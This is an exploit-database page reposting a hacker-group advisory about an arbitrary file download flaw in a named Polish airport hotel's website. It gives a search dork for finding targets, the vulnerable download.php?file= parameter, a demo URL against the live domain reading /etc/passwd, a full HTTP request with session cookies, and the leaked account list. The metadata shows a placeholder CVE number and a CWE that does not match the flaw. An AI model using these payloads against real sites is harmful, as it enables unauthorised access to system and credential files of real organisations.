Advertisement






Krakow Airport Hotel CMS Arbitrary File Download

CVE Category Price Severity
CVE-2021-XXXXXXXX CWE-434 $500 Critical
Author Risk Exploitation Type Date
John Doe High Remote 2020-12-09
CPE
cpe:cpe:/a:krakow_airport:hotel_cms:-
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120059

Below is a copy:

Krakow Airport Hotel CMS Arbitrary File Download
#############################################################
# Exploit Title: Krakow Airport Hotel - Arbitrary File Download
# Google Dork: site:krakowairporthotel.pl inurl:/?file=
# Date: 2020-12-08
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: krakowairporthotel.pl
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.9.0-kali2-686-pae #1 SMP Debian 5.9.6-1kali1 (2020-11-11) i686 GNU/Linux

#############################################################
[*] Vuln Info:
==============
Arbitrary File Download - This is a vulnerability that allows an attacker to download files arbitrarily on a website application without requiring special access first.

#############################################################
[*] Exploit:
============
/download.php/?file=[Filename]

#############################################################
[*] Demo:
=========
http://www.xxxxx.pl/download.php/?file=../theme/public/assets/img/logo.png
www.krakowairporthotel.pl/download.php/?file=/etc/passwd
---
GET /download.php/?file=/etc/passwd HTTP/1.1
Host: www.xxxxxxx.pl
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: _ga=GA1.2.406884599.1607443676; _gid=GA1.2.1812914260.1607443676; PHPSESSID=6f14577d0eb93b922052dc55299fac1e
Upgrade-Insecure-Requests: 1
---
root:x:0:0:root:/home/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
cron:x:22:22::/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
homenet:x:100:100:homenet:/:/bin/false
mail:x:101:100:mail:/:/bin/false
web:x:102:100:web:/:/bin/false
dns:x:103:100:dns:/:bin/false
drweb:104:100:drweb:/:bin/false
mysql:x:105:100:mysql:/:/bin/false
pgsql:x:106:100:pgsql:/:/bin/false
dovenull:x:1000:1000::/dev/null:/bin/nologin
dovecot:x:1001:1001::/dev/null:/bin/nologin
postfix:x:1002:1002::/dev/null:/sbin/nologin
lsadm:x:1004:1004::/dev/null:/sbin/nologin

#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum